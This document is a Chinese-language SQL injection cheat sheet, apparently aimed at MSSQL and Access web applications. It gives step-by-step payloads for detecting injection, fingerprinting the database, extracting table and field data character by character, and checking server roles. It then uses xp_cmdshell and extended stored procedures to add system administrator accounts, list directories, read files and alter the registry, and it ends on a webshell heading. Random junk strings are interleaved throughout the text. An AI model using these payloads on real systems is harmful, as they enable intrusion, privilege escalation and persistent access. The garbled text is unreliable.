1.判断是否有注入;and 1=1 ;and 1=2 3g
ep_aC
2.初步判断是否是mssql ;and user>0 ,}?x!3
tX)l_?jVH
3.注入参数是字符'and [查询条件] and ''=' R+}7]tva6C
aGSix}b1P
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 8=\}#F
dX^ ^
@7
5.判断数据库系统 (]ToBju
\2]M&n GT
;and (select count(*) from sysobjects)>0 mssql qD!qSM
F/.nr
;and (select count(*) from msysobjects)>0 access s
aY;[bz}
#$-{hg{
*5T^wZpj)
H;D5)eJ90
6.猜数据库 ;and (select Count(*) from [数据库名])>0 7\.{O$Q
x)GpNkx:
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 xw2dNJL
/h6K"w=='!
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 U4s)3jDw
cCa+UTxaJ
9.(1)猜字段的ascii值(access) (t[sSl
-,YoVB!T
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 |YEq<wbQ
xNAX)v3Z
(2)猜字段的ascii值(mssql) we?#
Dui
,v\^efc:%
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 |f67aN
x#)CH}J
10.测试权限结构(mssql) GoSdo
f
N_8HP6&
rD_\NgVAs
1/\JJ\
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
}%)]b*3
V$o]}|
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- k7ye,_&>
9 ^+8b9y
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- {(#2G,
Bl$Hg,in-
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- "($"T v2
-HQ(t
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- hlKM4JT\
@{V bu
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- $@utlIXA'
Te d1Ky2O
;and 1=(select IS_MEMBER('db_owner'));-- xky +"
]Y;5U
2pQ29
0Ba*"/U]t~
11.添加mssql和系统的帐户
Q h~
K&'Vd@
;exec master.dbo.sp_addlogin username;-- 'Bx"i
;exec master.dbo.sp_password null,username,password;-- ,::f?
Gc7j
(baBi9<P=
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- e|1.-P@
Ah:d2*SR4
;exec master.dbo.xp_cmdshell 'net user username password [ikW3 '99,
yt+d
f0l
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- [x[nTIg
;)Fc@OXN>
;exec master.dbo.xp_cmdshell 'net user username password /add';-- W @
?* ~
X+7@8)1(
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- Qo\+FkhYq
1[:tiTG|C
rK~Obv
IeN~E'~
12.(1)遍历目录 [6cF#_)*
lY$9-Q(
;create table dirs(paths varchar(100), id int) ;s\ck:Xg
^!A@:}t>
;insert dirs exec master.dbo.xp_dirtree 'c:\' CpLLsp hy
;Z 6ngS
;and (select top 1 paths from dirs)>0 B>r>z5
F a+#bX7
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) T|^KG<uPV!
R1?LB"aN
HRg< f= oz
>xCc#]v&
(2)遍历目录 AFdBf6/"i
8," 5z_
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- n?mV(? N
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 9f #6Q*/
]j: aO
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 Uys[0n
~5:-;ZbZ
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 bIy:~z5
<wTD}.n
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 0#:St
wOV}<.W
k#"}oI{<
6
:{=2ih-}
13.mssql中的存储过程 \5DOp-2
R>B4v+b
xp_regenumvalues 注册表根键, 子键 K<E|29t^k
-'Oq.$Qq
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 N$! Vm(S
q?$<{Z"
xp_regread 根键,子键,键值名 } m&La4E
~y" ^t@!E
;exec xp_regread }@TtX\7(D
>Pwu>
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ? t_$C,A+
P$i d?
xp_regwrite 根键,子键, 值名, 值类型, 值 w,VUWja
1kczlTF
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 d>hLnz1O
krecUpo
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 i p;
RlO
^3lEfI<pBm
xp_regdeletevalue 根键,子键,值名 !Ct'H1J-
94'0X
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 D:#e;K
T :0#se
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 F.$NYr/|y
cr>"LAi
R4AKp1Y
Sp\
7
14.mssql的backup创建webshell {GhM,-%e
&Xp